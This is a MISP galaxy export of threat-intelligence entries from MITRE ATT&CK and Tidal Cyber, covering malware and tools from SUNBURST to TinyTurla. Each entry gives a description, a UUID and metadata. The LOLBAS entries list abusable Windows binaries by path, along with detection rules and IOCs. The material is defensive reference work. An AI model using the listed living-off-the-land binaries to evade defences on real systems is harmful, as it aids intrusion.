SUNBURST is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by APT29 since at least February 2020.[SolarWinds Sunburst Sunspot Update January 2021][Microsoft Deep Dive Solorigate January 2021]
Internal MISP references
UUID 6b04e98e-c541-4958-a8a5-d433e575ce78 which can be used as unique global reference for SUNBURST in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0559 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SUNSPOT
SUNSPOT is an implant that injected the SUNBURST backdoor into the SolarWinds Orion software update framework. It was used by APT29 since at least February 2020.[CrowdStrike SUNSPOT Implant January 2021]
Internal MISP references
UUID 66966a12-3db3-4e43-a7e8-6c6836ccd8fe which can be used as unique global reference for SUNSPOT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0562 |
| source | MITRE |
| tags | ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SUPERNOVA
SUPERNOVA is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of APT29's SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests SUPERNOVA may have been used by the China-based threat group SPIRAL.[Guidepoint SUPERNOVA Dec 2020][Unit42 SUPERNOVA Dec 2020][SolarWinds Advisory Dec 2020][CISA Supernova Jan 2021][Microsoft Analyzing Solorigate Dec 2020]
Internal MISP references
UUID f02abaee-237b-4891-bb5d-30ca86dfc2c8 which can be used as unique global reference for SUPERNOVA in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0578 |
| source | MITRE |
| type | ['malware'] |
SVCReady
SVCReady is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between TA551 activity and SVCReady distribution, including similarities in file names, lure images, and identical grammatical errors.[HP SVCReady Jun 2022]
Internal MISP references
UUID a8110f81-5ee9-5819-91ce-3a57aa330dcb which can be used as unique global reference for SVCReady in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1064 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Sykipot
Sykipot is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of Sykipot hijacks smart cards on victims. [Alienvault Sykipot DOD Smart Cards] The group using this malware has also been referred to as Sykipot. [Blasco 2013]
Internal MISP references
UUID ae749f9c-cf46-42ce-b0b8-f0be8660e3f3 which can be used as unique global reference for Sykipot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0018 |
| source | MITRE |
| type | ['malware'] |
SynAck
SynAck is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. [SecureList SynAck Doppelgänging May 2018] [Kaspersky Lab SynAck May 2018]
Internal MISP references
UUID 19ae8345-745e-4872-8a29-d56c8800d626 which can be used as unique global reference for SynAck in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0242 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Syncappvpublishingserver
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Script used related to app-v and publishing server
Author: Oddvar Moe
Paths: * C:\Windows\System32\SyncAppvPublishingServer.vbs
Resources: * https://twitter.com/monoxgas/status/895045566090010624 * https://twitter.com/subTee/status/855738126882316288
Detection: * Sigma: proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml[Syncappvpublishingserver.vbs - LOLBAS Project]
Internal MISP references
UUID 6af0eac2-c35f-4569-ae09-47f1ca846961 which can be used as unique global reference for Syncappvpublishingserver in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5261 |
| source | Tidal Cyber |
| tags | ['9e504206-7a84-40a5-b896-8995d82e3586', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
SyncAppvPublishingServer
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by App-v to get App-v server lists
Author: Oddvar Moe
Paths: * C:\Windows\System32\SyncAppvPublishingServer.exe * C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
Resources: * https://twitter.com/monoxgas/status/895045566090010624
Detection: * Sigma: posh_ps_syncappvpublishingserver_exe.yml * Sigma: posh_pm_syncappvpublishingserver_exe.yml * Sigma: proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml * IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed[SyncAppvPublishingServer.exe - LOLBAS Project]
Internal MISP references
UUID f2928533-34e1-4599-a3ec-c8b4ef9d81b4 which can be used as unique global reference for SyncAppvPublishingServer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5166 |
| source | Tidal Cyber |
| tags | ['acda137a-d1c9-4216-9c08-d07c8d899725', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
SYNful Knock
SYNful Knock is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.[Mandiant - Synful Knock][Cisco Synful Knock Evolution]
Internal MISP references
UUID 69ab291d-5066-4e47-9862-1f5c7bac7200 which can be used as unique global reference for SYNful Knock in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Network'] |
| software_attack_id | S0519 |
| source | MITRE |
| tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852'] |
| type | ['malware'] |
Sys10
Sys10 is a backdoor that was used throughout 2013 by Naikon. [Baumgartner Naikon 2015]
Internal MISP references
UUID 2df35a92-2295-417a-af5a-ba5c943ef40d which can be used as unique global reference for Sys10 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0060 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SYSCON
SYSCON is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. SYSCON has been delivered by the CARROTBALL and CARROTBAT droppers.[Unit 42 CARROTBAT November 2018][Unit 42 CARROTBAT January 2020]
Internal MISP references
UUID ea556a8d-4959-423f-a2dd-622d0497d484 which can be used as unique global reference for SYSCON in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0464 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Syssetup
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows NT System Setup
Author: LOLBAS Team
Paths: * c:\windows\system32\syssetup.dll * c:\windows\syswow64\syssetup.dll
Resources: * https://twitter.com/pabraeken/status/994392481927258113 * https://twitter.com/harr0ey/status/975350238184697857 * https://twitter.com/bohops/status/975549525938135040 * https://windows10dll.nirsoft.net/syssetup_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: detect_rundll32_application_control_bypass___syssetup.yml[Syssetup.dll - LOLBAS Project]
Internal MISP references
UUID 5d220e4f-db5f-4523-8dc5-63a604f3964b which can be used as unique global reference for Syssetup in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5199 |
| source | Tidal Cyber |
| tags | ['9105775d-bdcb-45cc-895d-6c7bbb3d30ce', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
SystemBC
SystemBC is a commodity backdoor malware used as a Tor proxy and remote access Trojan (RAT). It was used during the high-profile 2021 Colonial Pipeline DarkSide ransomware attack and has since been used as a persistence & lateral movement tool during other ransomware compromises, including intrusions involving Ryuk, Egregor, and Play.[BlackBerry SystemBC June 10 2021][Sophos SystemBC December 16 2020][WithSecure SystemBC May 10 2021][Trend Micro Play Ransomware September 06 2022] According to Mandiant's 2023 M-Trends report, SystemBC was the second most frequently seen malware family in 2022 after only Cobalt Strike Beacon.[TechRepublic M-Trends 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/systembc/
PulseDive (IOCs): https://pulsedive.com/threat/SystemBC
Internal MISP references
UUID c30929fb-28a1-407c-a1c3-a83374c63267 which can be used as unique global reference for SystemBC in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5058 |
| source | Tidal Cyber |
| tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Systeminfo
Systeminfo is a Windows utility that can be used to gather detailed information about a computer. [TechNet Systeminfo]
Internal MISP references
UUID cecea681-a753-47b5-9d77-c10a5b4403ab which can be used as unique global reference for Systeminfo in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0096 |
| source | MITRE |
| tags | ['7b918200-2c8d-4b86-a81b-b2bdec5b2c2b', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
SysUpdate
SysUpdate is a backdoor written in C++ that has been used by Threat Group-3390 since at least 2020.[Trend Micro Iron Tiger April 2021]
Internal MISP references
UUID 148d587c-3b1e-4e71-bdfb-8c37005e7e77 which can be used as unique global reference for SysUpdate in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0663 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
T9000
T9000 is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. [FireEye admin@338 March 2014] [Palo Alto T9000 Feb 2016]
Internal MISP references
UUID c5647cc4-0d46-4a41-8591-9179737747a2 which can be used as unique global reference for T9000 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0098 |
| source | MITRE |
| type | ['malware'] |
Tactical RMM
According to joint Cybersecurity Advisory AA23-320A (November 2023), Tactical RMM is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID ba4777f9-bb3b-4143-8062-a510c30544ce which can be used as unique global reference for Tactical RMM in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5066 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Taidoor
Taidoor is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.[CISA MAR-10292089-1.v2 TAIDOOR August 2021] Taidoor has primarily been used against Taiwanese government organizations since at least 2010.[TrendMicro Taidoor]
Internal MISP references
UUID 9334df79-9023-44bb-bc28-16c1f07b836b which can be used as unique global reference for Taidoor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0011 |
| source | MITRE |
| type | ['malware'] |
Tailscale
According to joint Cybersecurity Advisory AA23-320A (November 2023), Tailscale is a publicly available, legitimate tool that "provides virtual private networks (VPNs) to secure network communications". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID 130a5491-1b93-45fd-bd72-9e5f8ddeba2a which can be used as unique global reference for Tailscale in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5069 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
TAINTEDSCRIBE
TAINTEDSCRIBE is a fully-featured beaconing implant integrated with command modules used by Lazarus Group. It was first reported in May 2020.[CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020]
Internal MISP references
UUID 1548c94a-fb4d-43d8-9956-ea26f5cc552f which can be used as unique global reference for TAINTEDSCRIBE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0586 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
TajMahal
TajMahal is a multifunctional spying framework that has been in use since at least 2014. TajMahal is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.[Kaspersky TajMahal April 2019]
Internal MISP references
UUID b1b7a8d9-6df3-4e89-8622-a6eea3da729b which can be used as unique global reference for TajMahal in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0467 |
| source | MITRE |
| type | ['malware'] |
Tar
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to extract and create archives.
Author: Brian Lucero
Paths: * C:\Windows\System32\tar.exe
Resources: * https://twitter.com/Cyber_Sorcery/status/1619819249886969856
Detection: * IOC: tar.exe extracting files from a remote host within the environment[Tar.exe - LOLBAS Project]
Internal MISP references
UUID 65e149a8-7c78-40d0-9cc5-9f420011facc which can be used as unique global reference for Tar in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5167 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Tarrask
Tarrask is malware that has been used by HAFNIUM since at least August 2021. Tarrask was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.[Tarrask scheduled task]
Internal MISP references
UUID 7bb9d181-4405-4938-bafb-b13cc98b6cd8 which can be used as unique global reference for Tarrask in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1011 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Tasklist
The Tasklist utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. [Microsoft Tasklist]
Internal MISP references
UUID abae8f19-9497-4a71-82b6-ae6edd26ad98 which can be used as unique global reference for Tasklist in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0057 |
| source | MITRE |
| tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
tcpdump
tcpdump is an open-source network packet analyzer utility run from the command line.
Internal MISP references
UUID 7a5d457c-949c-4e8f-817a-7e2d33f6c618 which can be used as unique global reference for tcpdump in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux', 'macOS', 'Windows'] |
| software_attack_id | S5267 |
| source | Tidal Cyber |
| tags | ['02495172-1563-48e7-8ac2-98463bd85e9d', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
TDSSKiller
TDSSKiller is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID c62b061a-b4d0-4b28-932c-3c9423443248 which can be used as unique global reference for TDSSKiller in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5044 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
TDTESS
TDTESS is a 64-bit .NET binary backdoor used by CopyKittens. [ClearSky Wilted Tulip July 2017]
Internal MISP references
UUID e7116740-fe7c-45e2-b98d-0c594a7dff2f which can be used as unique global reference for TDTESS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0164 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
te
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).
Author: Oddvar Moe
Paths: * no default
Resources: * https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
Detection: * Sigma: proc_creation_win_susp_use_of_te_bin.yml[te.exe - LOLBAS Project]
Internal MISP references
UUID 8eef4e4b-e294-47bb-befa-9cd97ceced57 which can be used as unique global reference for te in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5239 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Teams
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Electron runtime binary which runs the Teams application
Author: Andrew Kisliakov
Paths: * %LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe
Resources: * https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/
Detection: * IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app directory created * IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app.asar file created/modified by non-Teams installer/updater * Sigma: proc_creation_win_susp_electron_exeuction_proxy.yml[Teams.exe - LOLBAS Project]
Internal MISP references
UUID 13221a7b-6c23-48a7-97bd-21e2c689a391 which can be used as unique global reference for Teams in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5240 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
TeamViewer
TeamViewer is a tool used to enable remote connections to network devices for support and administration.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 6b5f6eb4-4cdd-4383-8623-d1f7de486865 which can be used as unique global reference for TeamViewer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5010 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
TEARDROP
TEARDROP is a memory-only dropper that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was likely used by APT29 since at least May 2020.[FireEye SUNBURST Backdoor December 2020][Microsoft Deep Dive Solorigate January 2021]
Internal MISP references
UUID bae20f59-469c-451c-b4ca-70a9a04a1574 which can be used as unique global reference for TEARDROP in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0560 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Teleport
Teleport is a custom tool for data exfiltration. It has been observed in use during intrusions involving Truebot, a botnet and loader malware, in 2022 and 2023.[U.S. CISA Increased Truebot Activity July 6 2023]
Internal MISP references
UUID b9a98499-c984-4199-ae64-d1381ebbaa1f which can be used as unique global reference for Teleport in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5011 |
| source | Tidal Cyber |
| tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['malware'] |
Terminator
Terminator is an open-source software package that is designed to facilitate disabling of endpoint security/antivirus tools by abusing the zam64.sys driver.[GitHub Terminator]
Internal MISP references
UUID 5cd0db7a-d47d-479b-89ac-9e78dfc0cd9d which can be used as unique global reference for Terminator in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5283 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
TestWindowRemoteAgent
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
Author: Onat Uzunyayla
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe
Resources: None Provided
Detection: * IOC: TestWindowRemoteAgent.exe spawning unexpectedly[TestWindowRemoteAgent.exe - LOLBAS Project]
Internal MISP references
UUID 2143f749-d7b8-43c0-8041-8aeb486142c2 which can be used as unique global reference for TestWindowRemoteAgent in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5241 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
TEXTMATE
TEXTMATE is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with POWERSOURCE in February 2017. [FireEye FIN7 March 2017]
Internal MISP references
UUID 49d0ae81-d51b-4534-b1e0-08371a47ef79 which can be used as unique global reference for TEXTMATE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0146 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
ThiefQuest
ThiefQuest is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. ThiefQuest was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.[Reed thiefquest fake ransom] Even though ThiefQuest presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.[wardle evilquest partii][reed thiefquest ransomware analysis]
Internal MISP references
UUID 2ed5f691-68eb-49dd-b730-793dc8a7d134 which can be used as unique global reference for ThiefQuest in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0595 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2e621fc5-dea4-4cb9-987e-305845986cd3'] |
| type | ['malware'] |
ThreatNeedle
ThreatNeedle is a backdoor that has been used by Lazarus Group since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of Lazarus Group's Manuscrypt (a.k.a. NukeSped) malware family.[Kaspersky ThreatNeedle Feb 2021]
Internal MISP references
UUID b31c7b8e-dbdd-4ad5-802e-dcdc72b7462e which can be used as unique global reference for ThreatNeedle in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0665 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
ThunderShell
ThunderShell is a tool used to facilitate remote access via HTTP requests.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 8fe38eda-30be-4c88-ae76-ac6ebc89d66b which can be used as unique global reference for ThunderShell in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5045 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'be319849-fb2c-4b5f-8055-0bde562c280b', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
TightVNC
According to its project page, TightVNC is a free and open-source remote desktop software tool that is Virtual Network Computing (VNC)-compatible. It is designed to enable remote access to other systems.[TightVNC Software Project Page]
Internal MISP references
UUID 6b0d5be9-5305-4b45-bed9-43dee66b85e8 which can be used as unique global reference for TightVNC in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux', 'macOS', 'Windows'] |
| software_attack_id | S5015 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
TinyTurla
TinyTurla is a backdoor that has been used by Turla against targets in the US, Germany, and Afghanistan since at least 2020.[Talos TinyTurla September 2021]
Internal MISP references
UUID 39f0371c-b755-4655-a97e-82a572f2fae4 which can be used as unique global reference for TinyTurla in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0668 |
| source | MITRE |
